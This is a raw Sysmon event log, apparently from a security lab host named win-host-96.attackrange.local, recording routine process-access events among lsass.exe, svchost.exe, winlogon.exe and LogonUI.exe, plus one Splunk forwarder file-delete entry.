12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292017Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292016Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292015Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.760{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292014Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.759{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292013Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.759{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292012Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.756{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292011Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.756{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292010Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.756{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292009Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.756{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292008Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.739{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292007Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.739{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292006Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.739{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292005Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.739{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B67ABA038FB51535C068E0AABAAB83,SHA256=A2ADD2B85A2DA3E995A02A1B2F56CCD4F99BEFADE56CDB117D7D596EB238852D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292004Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.708{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292003Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.708{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292002Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.708{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292001Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.708{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292000Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.708{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291999Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291998Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291997Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291996Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291995Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291994Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 